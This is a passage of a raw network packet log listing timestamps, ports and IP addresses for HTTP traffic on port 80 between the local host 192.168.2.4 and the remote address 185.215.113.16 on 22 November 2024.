Nov 22, 2024 20:35:39.093430042 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.093478918 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.093518972 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.093561888 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.094609022 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.094624996 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.094664097 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.094676018 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.095695019 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.095746040 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.095788956 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.095829010 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.096803904 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.096852064 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.096935987 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.096982002 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.097920895 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.097966909 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.098035097 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.098078966 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.099109888 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.099160910 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.099170923 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.099210024 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.100219011 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.100270033 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.100312948 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.100354910 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.101320028 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.101371050 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.101433992 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.101475000 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.102473974 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.102519989 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.102571011 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.102616072 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.103600025 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.103650093 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.103697062 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.103806973 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.104800940 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.104870081 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.104902029 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.104944944 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.105905056 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.105953932 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.106026888 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.106076002 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.107094049 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.107144117 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.107260942 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.107311010 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.108155966 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.108253956 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.108303070 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.109260082 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.109308958 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.109375000 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.109466076 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.110414982 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.110474110 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.110515118 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.110562086 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.111561060 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.111614943 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.111654043 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.111701965 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.112698078 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.112751007 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.112817049 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.112864017 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.113806963 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.113858938 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.113894939 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.113940954 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.114980936 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.115051985 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.115063906 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.115092993 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.116081953 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.116132975 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.116189003 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.116236925 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.117228031 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.117278099 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.117328882 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.117373943 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.118360043 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.118412971 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.118473053 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.118520975 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.119481087 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.119539976 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.119545937 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.119587898 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.120734930 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.120779991 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.120791912 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.120819092 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.121721983 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.121774912 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.121823072 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.121865988 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.122879028 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.122936010 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.122984886 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.123028994 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.124002934 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.124058008 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.124120951 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.124166012 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.125145912 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.125226974 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.125243902 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.125296116 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.126255989 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.126307011 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.126401901 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.126451015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.127650976 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.127705097 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.127715111 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.127758980 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.128529072 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.128577948 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.128640890 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.128684044 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.129690886 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.129739046 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.129796982 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.129843950 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.130784988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.130837917 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.130897999 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.130944014 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.131931067 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.131982088 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.132002115 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.132045031 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.133095026 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.133151054 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.133230925 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.133280039 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.134315968 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.134360075 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.134368896 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.134397984 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.135409117 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.135467052 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.135525942 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.135570049 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.136506081 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.136562109 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.136635065 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.136677027 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.137594938 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.137645006 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.137690067 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.137731075 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.138709068 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.138756990 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.271341085 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.271413088 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.271498919 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.271795988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.271878004 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.271915913 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.271930933 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.272949934 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.273071051 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.273125887 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.274096012 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.274209023 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.274260044 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.275209904 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.275341034 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.275392056 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.276408911 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.276459932 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.276505947 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.276803017 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.277512074 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.277625084 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.277672052 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.278600931 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.278717041 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.278759956 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.279774904 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.279911995 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.279958963 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.280963898 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.281013966 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.281095982 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.282007933 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.282059908 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.282121897 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.283159018 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.283215046 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.283255100 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.283302069 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.284269094 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.284387112 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.284435034 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.285401106 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.285454035 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.285504103 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.286120892 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.286524057 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.286570072 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.286575079 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.286622047 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.287730932 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.287806988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.287859917 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.288862944 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.288918972 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.288948059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.289014101 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.289958000 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.290014029 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.290047884 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.290112019 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.291078091 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.291135073 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.291188002 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.291232109 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.292207956 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.292316914 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.292368889 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.293356895 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.293406963 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.293459892 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.294080019 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.294490099 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.294589996 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.294636011 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.295593023 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.295644045 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.295711040 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.296746016 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.296801090 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.296848059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.297787905 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.297873974 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.297920942 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.297985077 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.298125982 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.299019098 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.299122095 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.299168110 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.300121069 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.300265074 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.300312996 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.301260948 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.301311970 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.301373005 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.302119970 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.302398920 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.302445889 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.302510977 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.302553892 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.303555012 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.303606033 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.303649902 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.303693056 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.304687977 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.304737091 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.304842949 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.304886103 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.305793047 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.305843115 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.305908918 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.305952072 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.306912899 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.307034016 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.307080030 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.308051109 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.308162928 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.308214903 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.309221983 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.309273958 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.309309006 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.310126066 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.310321093 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.310369968 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.310411930 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.310452938 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.311459064 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.311508894 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.311554909 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.311594963 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.312594891 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.312653065 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.312688112 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.312735081 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.313719988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.313776970 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.313819885 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.313864946 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.314867020 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.314958096 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.315015078 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.316041946 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.316109896 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.316165924 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.317137003 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.317248106 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.317303896 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.318331957 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.318420887 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.318494081 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.319406033 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.319463968 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.319509029 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.320785046 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.320841074 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.320902109 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.321647882 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.321708918 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.321785927 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.321835995 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.323105097 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.323148966 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.323201895 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.323936939 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.324074984 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.324130058 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.325057030 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.325154066 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.325203896 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.326225042 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.326311111 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.326365948 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.327373981 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.327429056 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.327430964 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.328145981 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.328474045 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.328540087 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.328582048 CET	80	49759	185.215.113.16	192.168.2.4
